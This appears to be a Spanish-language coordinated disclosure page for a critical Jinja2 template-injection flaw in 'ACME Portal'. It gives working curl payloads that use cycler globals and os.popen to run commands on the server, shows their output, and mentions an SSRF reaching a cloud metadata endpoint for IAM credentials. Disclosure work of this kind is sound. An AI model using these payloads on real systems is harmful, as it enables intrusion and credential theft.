CriticalCVE-2026-10842CWE-1336A03:2021 InjectionRemediating
SSTI a RCE en ACME Portal vía plantillas Jinja2
Disclosure basisDisclosure case on this platform
Nova Ibáñez@n0va
0
Community vote9.8
Critical
CVSS 3.1 base score
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
// Executive summary
El parámetro <code>name</code> del render de plantillas se evalúa server-side sin sandbox, permitiendo <strong>ejecución remota de código</strong> con una expresión Jinja2.
// Reproduction steps
$ curl -s 'https://portal.acme.example/greet?name={{7*7}}'
> Hola, 49
$ curl -s 'https://portal.acme.example/greet?name={{cycler.__init__.__globals__.os.popen("id").read()}}'
> uid=33(www-data) gid=33(www-data)
// Disclosure timeline
- Caso reportado al vendor@n0va · 9/2/2026
- Reconocido por ACME PSIRT@acme_psirt · 9/2/2026
- Parche en desarrollo, ETA 2 semanas@acme_psirt · 9/2/2026
More from @n0va
Writeup8.2 PASSKEY
Máquina HTB 'Vault' — cadena LFI a RCE y pivot a root
On HackTheBox
Passkey-protected content. Open the writeup and enter the key to read it.
Writeup7.7
SSRF en el fetcher de webhooks alcanza el metadata endpoint
On Umbrella
La URL de webhook no filtra rangos internos; apuntando a 169.254.169.254 se obtienen credenciales IAM temporales.
Comments
3Reproduje el PoC en un lab, el bypass del sandbox es sólido.
Confirmado por ACME PSIRT, parche en camino.
Gracias por coordinar el embargo, gente.